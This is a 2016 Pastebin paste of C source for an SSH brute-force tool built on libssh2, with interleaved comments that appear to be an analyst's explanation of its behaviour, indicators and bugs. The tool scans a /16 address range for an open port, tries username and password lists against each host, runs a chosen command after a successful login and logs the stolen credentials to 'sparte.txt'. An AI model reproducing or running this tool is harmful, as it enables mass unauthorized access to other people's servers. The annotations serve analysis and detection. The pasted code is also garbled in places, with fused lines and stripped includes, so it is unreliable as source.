
ssh bruteforce source

a guest
Jun 17th, 2016
  1.     #define LIBSSH2_STATIC 1
  2.     #include "libssh2_config.h"
  3.     #include #ifdef HAVE_WINSOCK2_H
  4.     # include
  5.     #endif
  6.     #ifdef HAVE_SYS_SOCKET_H
  7.     # include <sys/socket.h>
  8.     #endif
  9.     #ifdef HAVE_NETINET_IN_H
  10.     # include <netinet/in.h>
  11.     #endif
  12.     #ifdef HAVE_SYS_SELECT_H
  13.     # include <sys/select.h>
  14.     #endif
  15.     # ifdef HAVE_UNISTD_H
  16.     #include
  17.     #endif
  18.     #ifdef HAVE_ARPA_INET_H
  19.     # include <arpa/inet.h>
  20.     #endif
  21.     #include <sys/time.h>
  22.     #include <sys/types.h>
  23.     #include
  24.     #include
  25.     #include
  26.     #include
  27.     #include
  28.     #include
  29.     #include
  30.     #include
  31.     #include <sys/wait.h>
  32.     #include
  /* ANSI colour escape sequences for terminal output. The macro names are
     Romanian colour words (alb = white, rosu = red, galben = yellow,
     verde = green, albastru = blue). None is referenced in the code visible
     on this page. */
  33.     #define ALB "\033[1;37m"
  34.     #define ALB2 "\033[5;37m"
  35.     #define NORM "\033[00;00m"
  36.     #define BOLD "\033[00;01m"
  37.     #define ROSU "\033[01;31m"
  38.     #define GALBE "\033[01;33m"
  39.     #define VERDE "\033[01;32m"
  40.     #define ALBASTRU "\033[01;34m"
  /* FAKE is not referenced in the visible code.
     NOTE(review): the name and value suggest a substitute process name; confirm
     against a complete sample before treating "./jahid" as an indicator. */
  41.     #define FAKE "./jahid"
  /* COMPUTATIONS is not referenced in the visible code. */
  42.     #define COMPUTATIONS 3000
  /* Used only to initialise the global `denominator` (TOTAL_VAL_COUNT+1). */
  43.     #define TOTAL_VAL_COUNT 254
  /* Size of connlist: the ceiling on simultaneous connection attempts during the sweep. */
  44.     #define MAX_SOCKETS 1000
  /* Seconds a pending connect may stay open before check_sockets() abandons it. */
  45.     #define TIMEOUT 3
  /* Slot states stored in conn_t.status. */
  46.     #define S_NONE 0
  47.     #define S_CONNECTING 1
  /* Base64-style encoder constants. Of these, only BUFFFERLEN is used in the
     visible code (it sizes two arrays in main()). */
  48.     #define TABLELEN 63
  49.     #define BUFFFERLEN 128
  50.     #define ENCODERLEN 4
  51.     #define ENCODEROPLEN 0
  52.     #define ENCODERBLOCKLEN 3
  53.     #define PADDINGCHAR '='
  /* The trailing ';' on the last continuation line is part of the macro's
     replacement text. The macro is not referenced in the visible code. */
  54.     #define BASE64CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"\
  55.     "abcdefghijklmnopqrstuvwxyz"\
  56.     "0123456789"\
  57.     "+/";
  /* Defined after the #include lines above, so it cannot change how those
     headers were already processed. */
  58.     #define _FILE_OFFSET_BITS 64
  /* Both characters are counted as line ends by line_count(). */
  59.     #define EOL '\n'
  60.     #define CAR_RETURN '\r'
  /* SUCCESS and FAILURE are not referenced in the visible code. */
  61.     #define SUCCESS 0
  62.     #define FAILURE -1
  /* One slot in the port-sweep connection table. */
  63.     struct conn_t {
  64.     int s;                    /* socket descriptor for this attempt */
  65.     char status;              /* S_NONE (free) or S_CONNECTING (attempt pending) */
  66.     time_t a;                 /* time the attempt was started; compared against TIMEOUT */
  67.     struct sockaddr_in addr;  /* address and port being probed */
  68.     };
  /* Fixed table of MAX_SOCKETS slots shared by init_sockets(), check_sockets(),
     fatal() and scanbclass(). */
  69.     struct conn_t connlist[MAX_SOCKETS];
  70.     void init_sockets(void);
  71.     void check_sockets(void);
  72.     void fatal(char *);
  /* Output stream for the sweep; scanbclass() opens "scan.log" on it. */
  73.     FILE *outfd;
  /* Number of addresses that accepted a TCP connection during the sweep. */
  74.     int tot = 0;
  /* flag, where and denominator are not referenced in the visible code. */
  75.     int flag,where;
  /* These globals are shadowed by locals of the same names inside scan(). */
  76.     int numforks,maxf;
  77.     unsigned char denominator = TOTAL_VAL_COUNT+1;
  /*
   * Replace the first occurrence of `orig` in `str` with `rep`.
   *
   * Returns `str` itself when `orig` does not occur. Otherwise returns a
   * pointer to a function-static 4096-byte buffer holding the result; the
   * next call overwrites that buffer, so the function is not reentrant.
   *
   * Neither the strncpy() of the prefix nor the sprintf() of the remainder is
   * bounded by the buffer size: a result longer than 4095 characters is
   * written past the end of `buffer`.
   */
  78.     char *replace_str(char *str, char *orig, char *rep)
  79.     {
  80.     static char buffer[4096];
  81.     char *p;
  82.     if(!(p = strstr(str, orig)))
  83.     return str;
  /* Copy the text before the match; strncpy() adds no terminator here, the next line does. */
  84.     strncpy(buffer, str, p-str);
  85.     buffer[p-str] = '\0';
  /* Append the replacement and whatever followed the match. */
  86.     sprintf(buffer+(p-str), "%s%s", rep, p+strlen(orig));
  87.     return buffer;
  88.     }
  /*
   * Reset the connection table: mark every slot in connlist as S_NONE and
   * zero its sockaddr_in. The descriptor and timestamp fields are left as
   * they are.
   */
  89.     void init_sockets(void)
  90.     {
  91.     int i;
  92.     for (i = 0; i < MAX_SOCKETS; i++)
  93.     {
  94.     connlist[i].status = S_NONE;
  95.     memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in));
  96.     }
  97.     return;
  98.     }
  /*
   * Poll every pending slot in connlist once.
   *
   * A slot older than TIMEOUT seconds is closed and freed. Any other pending
   * slot has connect() called on its non-blocking socket; when that shows the
   * connection is established, the target address is written to outfd, `tot`
   * is incremented, and the socket is closed without any data being sent.
   *
   * On the network this appears as completed TCP handshakes to one port
   * across many addresses, each closed immediately by the client, which flow
   * or connection logs can surface.
   */
  99.     void check_sockets(void)
  100.     {
  101.     int i, ret;
  102.     for (i = 0; i < MAX_SOCKETS; i++)
  103.     {
  /* Attempt has been pending longer than TIMEOUT: give up on this address. */
  104.     if ((connlist[i].a < (time(0) - TIMEOUT)) && (connlist[i].status == S_CONNECTING))
  105.     {
  106.     close(connlist[i].s);
  107.     connlist[i].status = S_NONE;
  108.     }
  109.     else if (connlist[i].status == S_CONNECTING)
  110.     {
  /* scanbclass() only prepares the socket; connect() is issued here, and
     re-issued on each later poll, to start and then query the attempt. */
  111.     ret = connect(connlist[i].s, (struct sockaddr *)&connlist[i].addr,
  112.     sizeof(struct sockaddr_in));
  113.     if (ret == -1)
  114.     {
  /* EISCONN: an earlier non-blocking connect() completed, so the port accepted
     the connection. Record the address. */
  115.     if (errno == EISCONN)
  116.     {
  117.     tot++;
  118.     fprintf(outfd, "%s\n",
  119.     (char *)inet_ntoa(connlist[i].addr.sin_addr));
  120.     close(connlist[i].s);
  121.     connlist[i].status = S_NONE;
  122.     }
  /* Any errno other than "still in progress" frees the slot. This is a separate
     `if`, not an `else`, so it is also evaluated after the EISCONN branch above
     has already closed the descriptor. */
  123.     if ((errno != EALREADY) && (errno != EINPROGRESS))
  124.     {
  125.     close(connlist[i].s);
  126.     connlist[i].status = S_NONE;
  127.     }
  128.     }
  129.     else
  130.     {
  /* connect() returned 0: the connection was established by this call. */
  131.     tot++;
  132.     fprintf(outfd, "%s\n",
  133.     (char *)inet_ntoa(connlist[i].addr.sin_addr));
  134.     close(connlist[i].s);
  135.     connlist[i].status = S_NONE;
  136.     }
  137.     }
  138.     }
  139.     }
  /*
   * Print `err` to stdout, close the socket of every slot whose status is
   * S_CONNECTING or higher, close outfd, and terminate the process with
   * EXIT_FAILURE. Does not return.
   */
  140.     void fatal(char *err)
  141.     {
  142.     int i;
  143.     printf("Error: %s\n", err);
  144.     for (i = 0; i < MAX_SOCKETS; i++) if (connlist[i].status >= S_CONNECTING)
  145.     close(connlist[i].s);
  146.     fclose(outfd);
  147.     exit(EXIT_FAILURE);
  148.     }
  /*
   * Block for up to 2 seconds until `socket_fd` is ready in the direction(s)
   * libssh2 reports the session is waiting on.
   *
   * Returns the value returned by select().
   */
  149.     static int waitsocket(int socket_fd, LIBSSH2_SESSION *session)
  150.     {
  151.     struct timeval timeout;
  152.     int rc;
  153.     fd_set fd;
  154.     fd_set *writefd = NULL;
  155.     fd_set *readfd = NULL;
  156.     int dir;
  157.     timeout.tv_sec = 2;
  158.     timeout.tv_usec = 0;
  159.     FD_ZERO(&fd);
  160.     FD_SET(socket_fd, &fd);
  /* The same fd_set is passed as the read set, the write set, or both,
     depending on the direction flags. */
  161.     dir = libssh2_session_block_directions(session);
  162.     if(dir & LIBSSH2_SESSION_BLOCK_INBOUND)
  163.     readfd = &fd;
  164.     if(dir & LIBSSH2_SESSION_BLOCK_OUTBOUND)
  165.     writefd = &fd;
  166.     rc = select(socket_fd + 1, readfd, writefd, NULL, &timeout);
  167.     return rc;
  168.     }
  /*
   * Make one SSH password-authentication attempt against hostname:portar with
   * username/password via libssh2 and, if it is accepted, run `command` on the
   * remote host.
   *
   * On the first non-empty read of the command's output, the credentials, host,
   * port and output are printed to stderr and appended to "sparte.txt" in the
   * working directory. A login whose command yields no output leaves no record.
   *
   * Returns 1 if libssh2_init() fails, -1 if the TCP connect or SSH handshake
   * fails, and 0 through the `shutdown` label (which is reached both after a
   * rejected password and after a logged success). The path that closes the
   * channel normally ends in exit(0) rather than returning.
   *
   * What is observable from this function:
   *  - each call is one TCP connection carrying at most one password attempt;
   *  - the server's host key is never examined (`fingerprint` is declared but
   *    unused);
   *  - the SSH disconnect description is "Normal Shutdown, Thank you for
   *    playing". libssh2's own example programs use the same text, so on its
   *    own it is a weak indicator;
   *  - "sparte.txt" holds recovered credentials in clear text.
   */
  169.     int checkauth(char *username,char *password,char *hostname, char *portar, char *command)
  170.     {
  171.     const char *commandline = command;
  172.     FILE *vulnf,*nolog;
  173.     unsigned long hostaddr;
  174.     int sock, port;
  175.     struct sockaddr_in sin;
  176.     const char *fingerprint;
  177.     LIBSSH2_SESSION *session;
  178.     LIBSSH2_CHANNEL *channel;
  179.     int rc;
  180.     int exitcode;
  181.     char *exitsignal=(char *)"none";
  182.     int bytecount = 0;
  183.     size_t len;
  184.     int type, var;
  /* 10-second send and receive timeouts are applied to the socket below. */
  185.     struct timeval timeout;
  186.     timeout.tv_sec = 10;
  187.     timeout.tv_usec = 0;
  188.     port=atoi(portar);
  189.     rc = libssh2_init (0);
  190.     if (rc != 0) {
  191.     fprintf (stderr, "libssh2 initialization failed (%d)\n", rc);
  192.     return 1;
  193.     }
  /* Neither the inet_addr() nor the socket() result is checked before use. */
  194.     hostaddr = inet_addr(hostname);
  195.     sock = socket(AF_INET, SOCK_STREAM, 0);
  196.     sin.sin_family = AF_INET;
  197.     sin.sin_port = htons(port);
  198.     sin.sin_addr.s_addr = hostaddr;
  /* error() is not declared anywhere in the visible source. */
  199.     if (setsockopt (sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout,
  200.     sizeof(timeout)) < 0)
  201.     error("setsockopt failed\n");
  202.     if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout,
  /* The paste fused many source lines into the next physical line. In order it
     contains: TCP connect, session init, SSH handshake, the single
     libssh2_userauth_password() call, channel open, libssh2_channel_exec() of
     the command, and the start of the output-read loop. */
  203.     sizeof(timeout)) < 0) error("setsockopt failed\n"); if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { return -1; } session = libssh2_session_init(); while ((rc = libssh2_session_handshake(session, sock)) == LIBSSH2_ERROR_EAGAIN); if (rc) { return -1; } while ((rc = libssh2_userauth_password(session, username, password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { goto shutdown; } while( (channel = libssh2_channel_open_session(session)) == NULL && libssh2_session_last_error(session,NULL,NULL,0) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( channel == NULL ) { goto shutdown; } while( (rc = libssh2_channel_exec(channel, commandline)) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( rc != 0 ) { goto shutdown; } for( ;; ) { int rc; do { char buffer[65535]; rc = libssh2_channel_read( channel, buffer, sizeof(buffer) ); if( rc > 0 )
  204.     {
  205.     int i;
  206.     bytecount += rc;
  /* strtok() cuts the caller's hostname string at its first newline, in place. */
  207.     hostname = strtok (hostname, "\n");
  /* `buffer` is printed with %s, but nothing visible here NUL-terminates it
     after libssh2_channel_read() fills it. */
  208.     fprintf(stderr, "[*] WOW : %s:%s %s port: %s \n", username,password,hostname, portar);
  209.     fprintf(stderr, "[*] Kernel: %s \n", buffer);
  /* Success record: one appended line per hit. The fopen() result is not checked. */
  210.     vulnf=fopen("sparte.txt","a+");
  211.     fprintf(vulnf,"%s:%s %s port: %s --> %s \n",username,password,hostname,portar, buffer);
  212.     fclose(vulnf);
  213.     goto shutdown;
  /* The `for` that opens the next line is unreachable: it follows the goto. */
  214.     for( i=0; i < rc; ++i ) var = i; } else { if( rc != LIBSSH2_ERROR_EAGAIN ) goto shutdown; } } while( rc > 0 );
  215.     if( rc == LIBSSH2_ERROR_EAGAIN )
  216.     {
  217.     waitsocket(sock, session);
  218.     }
  219.     else
  220.     break;
  221.     }
  222.     exitcode = 127;
  223.     while( (rc = libssh2_channel_close(channel)) == LIBSSH2_ERROR_EAGAIN )
  224.     waitsocket(sock, session);
  225.     if( rc == 0 )
  226.     {
  227.     exitcode = libssh2_channel_get_exit_status( channel );
  228.     libssh2_channel_get_exit_signal(channel, &exitsignal,
  229.     NULL, NULL, NULL, NULL, NULL);
  230.     }
  /* Both branches are no-ops (`var = var`); the exit signal is not used. */
  231.     if (exitsignal)
  232.     var = var;
  233.     else
  234.     var = var;
  235.     libssh2_channel_free(channel);
  /* The socket is closed before libssh2_session_disconnect() is called on this path. */
  236.     close(sock);
  237.     channel = NULL;
  238.     libssh2_session_disconnect(session,
  239.     "Normal Shutdown, Thank you for playing");
  240.     libssh2_session_free(session);
  241.     libssh2_exit();
  /* Terminates the calling process; scan() calls this function from a forked child. */
  242.     exit(0);
  /* Common exit for a rejected password, a channel or exec failure, and a logged success. */
  243.     shutdown:
  244.     libssh2_session_disconnect(session,
  245.     "Normal Shutdown, Thank you for playing");
  246.     libssh2_session_free(session);
  247.     #ifdef WIN32
  248.     closesocket(sock);
  249.     #else
  250.     close(sock);
  251.     #endif
  252.     var = var;
  253.     libssh2_exit();
  254.     return 0;
  255.     }
  /*
   * TCP connect sweep of the addresses bclass.0.1 through bclass.255.254 on
   * `port`, where `bclass` supplies the first two octets.
   *
   * Up to MAX_SOCKETS non-blocking sockets are kept in flight; check_sockets()
   * completes or expires them and writes each responsive address to
   * "scan.log", which is deleted and re-created in the working directory at
   * the start of the run. Progress is printed to stdout.
   *
   * Always returns 1. Exits the process if "scan.log" cannot be opened, and
   * calls fatal() if inet_addr() rejects a generated address.
   */
  256.     int scanbclass(char *bclass, char *port)
  257.     {
  258.     int done = 0, i, cip = 1, bb = 0, ret, k, ns, x;
  259.     time_t scantime;
  260.     char ip[20], outfile[128], last[256];
  /* Local prototype for unlink(). */
  261.     int unlink(const char *pathname);
  262.     errno = 0;
  /* Remove results from any previous sweep; failure is reported but not fatal. */
  263.     if(unlink("scan.log"))
  264.     {
  265.     printf("\n unlink() failed - [%s]\n",strerror(errno));
  266.     }
  267.     memset(&outfile, 0, sizeof(outfile));
  /* The format string has no conversions, so bclass and port are ignored and
     the output name is always "scan.log". */
  268.     snprintf(outfile, sizeof(outfile) - 1, "scan.log", bclass, port);
  269.     if (!(outfd = fopen(outfile, "a")))
  270.     {
  271.     perror(outfile);
  272.     exit(EXIT_FAILURE);
  273.     }
  /* The bclass argument has no matching conversion and is not printed. */
  274.     printf("[-] Searching: ", bclass);
  275.     fflush(stdout);
  276.     memset(&last, 0, sizeof(last));
  277.     init_sockets();
  278.     scantime = time(0);
  279.     while(!done)
  280.     {
  281.     for (i = 0; i < MAX_SOCKETS; i++)
  282.     {
  /* cip is the fourth octet and bb the third; cip == 255 means the current
     third-octet block is exhausted. */
  283.     if (cip == 255)
  284.     {
  285.     if (bb == 255)
  286.     {
  /* Whole range handed out: finish once no slot is still pending. */
  287.     ns = 0;
  288.     for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE)
  289.     {
  290.     ns++;
  291.     break;
  292.     }
  293.     }
  294.     if (ns == 0)
  295.     done = 1;
  296.     break;
  297.     }
  298.     else
  299.     {
  /* Advance to the next third octet and redraw the progress line in place. */
  300.     cip = 0;
  301.     bb++;
  302.     for (x = 0; x < strlen(last); x++)
  303.     putchar('\b');
  304.     memset(&last, 0, sizeof(last));
  305.     snprintf(last, sizeof(last) - 1, "%s.%d.* on port: %s [Found: %d] [%.1f%% Done]",
  306.     bclass, bb, port, tot, (bb / 255.0) * 100);
  307.     printf("%s", last);
  308.     fflush(stdout);
  309.     }
  310.     }
  /* Free slot: prepare a non-blocking socket for the next address. connect()
     itself is issued later by check_sockets(). */
  311.     if (connlist[i].status == S_NONE)
  312.     {
  313.     connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
  314.     if (connlist[i].s == -1)
  315.     printf("Unable to allocate socket.\n");
  316.     else
  317.     {
  318.     ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);
  319.     if (ret == -1)
  320.     {
  321.     printf("Unable to set O_NONBLOCK\n");
  322.     close(connlist[i].s);
  323.     }
  324.     else
  325.     {
  326.     memset(&ip, 0, 20);
  /* Unbounded sprintf() into the 20-byte `ip`; bclass comes from the command line. */
  327.     sprintf(ip, "%s.%d.%d", bclass, bb, cip);
  328.     connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
  329.     if (connlist[i].addr.sin_addr.s_addr == -1)
  330.     fatal("Invalid IP.");
  331.     connlist[i].addr.sin_family = AF_INET;
  332.     connlist[i].addr.sin_port = htons(atoi(port));
  /* Start of the TIMEOUT window that check_sockets() enforces. */
  333.     connlist[i].a = time(0);
  334.     connlist[i].status = S_CONNECTING;
  335.     cip++;
  336.     }
  337.     }
  338.     }
  339.     }
  340.     check_sockets();
  341.     }
  /* %u is given a time_t difference here. */
  342.     printf("\n[!] Scanning complete In %u Seconds. [We got %d ips]\n", (time(0) - scantime), tot);
  343.     fclose(outfd);
  344.     return 1;
  345.     }
  /*
   * Count line-end characters in the named file.
   *
   * Every '\n' (EOL) and every '\r' (CAR_RETURN) is counted separately, so a
   * CRLF-terminated line contributes two. Prints an error and calls exit(0)
   * if the file cannot be opened. Not called anywhere in the visible code.
   */
  346.     int line_count(char* __str_file_name) {
  347.     FILE* fd;
  348.     int ch;
  349.     if ((fd = fopen(__str_file_name, "r")) == NULL) {
  350.     printf("[Error] : While opening the file\n");
  351.     exit(0);
  352.     }
  /* The counter is unsigned but is returned through the function's int return type. */
  353.     unsigned int line_count = 0;
  354.     while ( (ch = fgetc(fd)) != EOF)
  355.     if (ch == EOL || ch == CAR_RETURN)
  356.     ++line_count;
  357.     if (fd) {
  358.     fclose(fd);
  359.     }
  360.     return line_count;
  361.     }
  /*
   * Drive the credential attempts: for every line of `userfile`, for every
   * line of `passfile`, for every line of `ipfile`, fork a child that calls
   * checkauth() once.
   *
   * A literal "$user" in a password line is replaced with the current user
   * name via replace_str(). `thr` is the limit on outstanding children;
   * `portar` and `commandline` are passed through to checkauth(). `app` is
   * unused. The function ends in exit(0) and never returns to its caller.
   *
   * Because the address list is the innermost loop, each target receives one
   * attempt per credential pair, and consecutive attempts against the same
   * target are separated by a pass over the whole list.
   */
  362.     int scan(char *app, char *thr, char *ipfile, char *userfile, char *passfile, char *portar, char *commandline)
  363.     {
  /* These locals shadow the globals of the same names; numforks is never
     initialised before it is incremented and compared below. */
  364.     int numforks, maxf, status;
  365.     FILE *fp,*passf, *userf;
  366.     char buff[4096];
  367.     char nutt2[4096];
  368.     char nutt[4096];
  369.     char *pass, *user;
  /* The three malloc() results are discarded; these calls only leak memory. */
  370.     malloc(sizeof(nutt));
  371.     malloc(sizeof(nutt2));
  372.     malloc(sizeof(buff));
  373.     pid_t PID;
  374.     char *ns = NULL;
  375.     maxf=atoi(thr);
  /* exit(printf(...)) uses the number of characters printed as the exit status. */
  376.     if((userf=fopen(userfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", userfile));
  377.     while (fgets(nutt2,sizeof(nutt2),userf)){
  /* strdup() copies are never freed; strtok() strips the trailing newline. */
  378.     user = strdup (nutt2);
  379.     user = strtok (user, "\n");
  /* The password file is reopened and reread for every user. */
  380.     if((passf=fopen(passfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", passfile));
  381.     while (fgets(nutt,sizeof(nutt),passf)) {
  382.     pass = strdup (nutt);
  383.     pass = strtok (pass, "\n");
  384.     ns = replace_str(pass, "$user", user);
  /* Every credential pair is echoed to stdout in clear text. */
  385.     printf("[*] Trying: %s:%s on found ips\n",user,ns);
  386.     if((fp=fopen(ipfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s", ipfile));
  387.     while(fgets(buff,sizeof(buff),fp))
  388.     {
  /* One child process per (user, password, address) triple. */
  389.     PID = fork();
  /* The paste fused several source lines into the next physical line, so as
     shown the `//` comment runs to the end of that line and takes the child's
     exit(0), the else branch and the numforks test with it. In intent, the
     child runs checkauth() and exits, and the parent counts the fork and waits
     for children while numforks exceeds maxf. */
  390.     if (PID < 0) { fprintf(stderr, "[!] Couldn't fork!\n"); exit(1); } if (( PID == 0 )){ checkauth(user,ns,buff, portar, commandline); //printf("[*] Trying: %s:%s %s:%s Protocol:%s\n",user,ns, buff,portar,prot); exit(0); } else { numforks++; if (numforks > maxf)
  391.     for (numforks; numforks > maxf; numforks--)
  392.     PID = wait(&status);
  393.     }
  394.     }
  395.     fclose(fp);
  396.     }
  397.     fclose(passf);
  398.     }
  399.     fclose(userf);
  400.     exit(0);
  401.     }
  /*
   * Entry point. argv[1] selects the mode:
   *   -f  argv[2] is a file of addresses; scan() runs over it.
   *   -r  options are parsed and checked, but the genrand() call is commented out.
   *   -R  options are parsed and checked, but the genrandl() call is commented out.
   *   -b  argv[2] is a two-octet prefix; scanbclass() writes "scan.log", then
   *       scan() runs over that file.
   * Options read from anywhere in argv: -p (port), -user and -pass (word-list
   * files), -t (limit on child processes), -c (command run after a login).
   *
   * Exits with status -1 through the `err` label when a check fails.
   *
   * Input handling as written:
   *  - argv[1] is read without checking argc;
   *  - `input` is uninitialised when argv[1] matches none of the four flags;
   *  - each option takes argv[i+1] without checking that it exists;
   *  - the option pointers (port, threads, command and the rest) are
   *    uninitialised when their flag is absent, including in the
   *    `command != NULL` tests;
   *  - the files opened for validation are never closed.
   */
  402.     int main(int argc, char *argv[])
  403.     {
  404.     int input,i=0;
  /* The local FILE pointer named `scanf` shadows the stdio function of that name. */
  405.     FILE *fp,*passf, *userf, *scanf;
  /* encodedoutput and decodedoutput are not used in the visible code. */
  406.     char encodedoutput[BUFFFERLEN + 1] = "";
  407.     char decodedoutput[BUFFFERLEN + 1] = "";
  408.     char *userfile, *passfile, *command, *threads, *scanfile, *bclass, *port, *t2, *prot;
  409.     if(strcmp(argv[1],"-f")==0) { input = 1; }
  410.     if(strcmp(argv[1],"-r")==0) { input = 2; }
  411.     if(strcmp(argv[1],"-R")==0) { input = 3; }
  412.     if(strcmp(argv[1],"-b")==0) { input = 4; }
  413.     switch ( input ) {
  /* Mode -f: address list supplied in a file. */
  414.     case 1:
  415.     for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } scanfile = argv[2]; if((scanf=fopen(scanfile,"r"))!= NULL){ if (atoi(threads)) { if (atoi(port) > 2) {
  416.     if((userf=fopen(userfile,"r"))!=NULL){
  417.     if((passf=fopen(passfile,"r"))!=NULL){
  418.     if(command != NULL) { scan(argv[0],threads,scanfile,userfile,passfile,port,command);}
  419.     else { goto err; }
  420.     } else { goto err; }
  421.     } else { goto err; }
  422.     } else { goto err; }
  423.     } else { goto err; }
  424.     } else { goto err; }
  425.     break;
  /* Mode -r: validation only; the worker call is commented out. */
  426.     case 2:
  427.     for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) {
  428.     if((userf=fopen(userfile,"r"))!=NULL){
  429.     if((passf=fopen(passfile,"r"))!=NULL){
  430.     if(command != NULL) {
  431.     //genrand(argv[0],threads,userfile,passfile,port,command);
  432.     }
  433.     else { goto err; }
  434.     } else { goto err; }
  435.     } else { goto err; }
  436.     } else { goto err; }
  437.     } else { goto err; }
  438.     break;
  /* Mode -R: validation only; the worker call is commented out. */
  439.     case 3:
  440.     for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) {
  441.     //genrandl(threads, port);
  442.     } else { goto err; }
  443.     } else { goto err; }
  444.     break;
  /* Mode -b: sweep the prefix first, then run the credential attempts over "scan.log". */
  445.     case 4:
  446.     for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } bclass = argv[2]; if (atoi(threads)) { if (atoi(port) > 2) {
  447.     if((userf=fopen(userfile,"r"))!=NULL){
  448.     if((passf=fopen(passfile,"r"))!=NULL){
  449.     if(command != NULL) {
  450.     scanbclass(bclass, port);
  451.     scan(argv[0],threads,"scan.log",userfile,passfile,port, command);
  452.     }
  453.     else { goto err; }
  454.     } else { goto err; }
  455.     } else { goto err; }
  456.     } else { goto err; }
  457.     } else { goto err; }
  458.     break;
  459.     default:
  460.     printf( "Bad command, quitting!\n" );
  461.     exit (0);
  462.     break;
  463.     }
  /* Reached only in the modes whose worker call is commented out; scan() exits the process itself. */
  464.     getchar();
  465.     exit (0);
  466.     err:
  467.     exit (-1);
  468.     }